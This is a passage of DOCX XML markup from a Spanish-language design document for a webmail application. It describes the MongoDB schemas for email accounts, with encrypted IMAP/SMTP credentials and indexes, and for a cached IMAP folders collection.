        </w:rPr>
        <w:t xml:space="preserve">  lastSyncedAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de creación de la cuenta */</w:t>
      </w:r>
      <w:r>
        <w:br/>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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de última modificación */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  updatedAt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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">authCredentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se encripta con AES-256-GCM usando el plugin mongoose-aes-encryption, que proporciona encriptación transparente: la aplicación lee y escribe valores en texto plano mientras solo ciphertext toca la base de datos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[154]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esta decisión es crítica para webmail, donde las credenciales de acceso a servidores de correo externo constituyen el activo más sensible del sistema. Incluso en caso de compromiso completo de la base de datos MongoDB, las credenciales permanecen protegadas siempre que la clave maestra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(almacenada como variable de entorno del servidor) no se vea expuesta.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1630"/>
        <w:gridCol w:w="1397"/>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="3028"/>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Índice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ObjectId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identificador único de la cuenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">userId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ObjectId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FK a users._id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dirección de email de la cuenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">isPrimary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cuenta por defecto para envío</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imap.host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Servidor IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imap.port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Puerto IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imap.authMethod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">password u oauth2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imap.authCredentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password/token encriptado</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[154]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">smtp.host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Servidor SMTP</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">active, syncing, error, disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">lastSyncedAt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Última sincronización exitosa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Índices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{userId: 1, isPrimary: -1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar cuentas de un usuario con la primaria primero.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{email: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— unique, para prevenir duplicados.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{status: 1, lastSyncedAt: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para queries de monitoreo de sincronización.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="81" w:name="colección-folders-cache-local-imap"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">folders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Cache Local IMAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">folders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mantiene un espejo de la jerarquía de carpetas IMAP para cada cuenta, permitiendo que el frontend muestre la estructura de buzones sin consultar el servidor IMAP en cada carga de página.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> IFolder {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia a la cuenta */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Nombre completo de la carpeta en el servidor IMAP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Delimitador de jerarquía (típicamente '.' o '/') */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  delimiter</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Nombre para mostrar (último componente del path) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  displayName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Path de la carpeta padre (vacío para root) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  parentPath</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Flags especiales de IMAP */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  flags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e.g., ['\\HasNoChildren', '\\Sent']</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Flag funcional especial (si aplica) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  specialUse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'inbox'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'sent'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'drafts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'trash'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'junk'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'archive'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** UIDVALIDITY del servidor IMAP para esta carpeta */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  uidValidity</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** UIDNEXT esperado (para detectar mensajes nuevos) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  uidNext</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Número total de mensajes */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  totalMessages</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Número de mensajes no leídos */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  unseenMessages</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si la carpeta está suscrita */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  subscribed</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Orden de visualización configurable por el usuario */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  sortOrder</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si la carpeta está expandida en la UI */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  expanded</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de última sincronización */</w:t>
      </w:r>
      <w:r>
        <w:br/>
